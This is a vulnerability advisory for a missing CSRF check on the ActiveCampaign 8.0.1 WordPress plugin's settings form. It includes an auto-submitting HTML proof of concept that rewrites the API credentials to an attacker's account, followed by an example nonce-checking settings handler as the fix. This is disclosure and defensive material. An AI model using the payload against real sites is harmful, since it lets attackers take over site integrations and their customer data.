The ActiveCampaign 8.0.1 plugin lacks a CSRF check on its Settings form, which could allow an attacker to make a logged-in administrator change the API credentials to those of the attacker’s account.
When a logged-in administrator visits an HTML page containing the content below, the plugin's settings will be changed.
<html>
<body>
<form action="http://example.com/wp-admin/options-general.php?page=activecampaign" method="POST">
<input type="hidden" name="api_url" value="https://yopmail59247.api-us1.com" />
<input type="hidden" name="api_key" value="1eddfe8b3ac848b2154b0f6a1a345730ecef457745c2b70463e0a4838fd30d681ec20369" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
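The check this form is missing, shown as an added example (not code from the ActiveCampaign plugin or from this advisory): a minimal WordPress settings page that issues a nonce with the form and verifies it before saving. Only the field names `api_url` and `api_key` come from the proof of concept above; the `demo_ac_*` names, the `demo-ac` page slug, the option names and the nonce action are assumptions.

```php
<?php
/**
 * Plugin Name: Demo AC Settings (added example, not the ActiveCampaign plugin's code)
 */

// Hypothetical names: every demo_ac_* identifier, the page slug and the option
// names are assumptions. Only api_url / api_key are taken from the PoC form.
const DEMO_AC_NONCE_ACTION = 'demo_ac_save_settings';
const DEMO_AC_NONCE_FIELD  = 'demo_ac_nonce';

add_action( 'admin_menu', function () {
    add_options_page( 'Demo AC', 'Demo AC', 'manage_options', 'demo-ac', 'demo_ac_settings_page' );
} );

function demo_ac_settings_page() {
    // Authorization: only administrators may view or change the credentials.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( 'POST' === $_SERVER['REQUEST_METHOD'] ) {
        // CSRF check: execution stops here unless the POST carries a valid
        // nonce for this action, bound to the current user and session.
        // A form hosted on another origin cannot read that value.
        check_admin_referer( DEMO_AC_NONCE_ACTION, DEMO_AC_NONCE_FIELD );

        $api_url = isset( $_POST['api_url'] ) ? esc_url_raw( wp_unslash( $_POST['api_url'] ) ) : '';
        $api_key = isset( $_POST['api_key'] ) ? sanitize_text_field( wp_unslash( $_POST['api_key'] ) ) : '';
        update_option( 'demo_ac_api_url', $api_url );
        update_option( 'demo_ac_api_key', $api_key );
        echo '<div class="updated"><p>Settings saved.</p></div>';
    }
    ?>
    <div class="wrap">
      <h1>Demo AC Settings</h1>
      <form method="post">
        <?php wp_nonce_field( DEMO_AC_NONCE_ACTION, DEMO_AC_NONCE_FIELD ); // emits the hidden nonce input ?>
        <input type="text" name="api_url" value="<?php echo esc_attr( get_option( 'demo_ac_api_url', '' ) ); ?>" />
        <input type="password" name="api_key" value="" autocomplete="off" />
        <?php submit_button(); ?>
      </form>
    </div>
    <?php
}
```

With this handler, a request shaped like the auto-submitting form above carries no `demo_ac_nonce` value, so `check_admin_referer()` ends the request before `update_option()` runs.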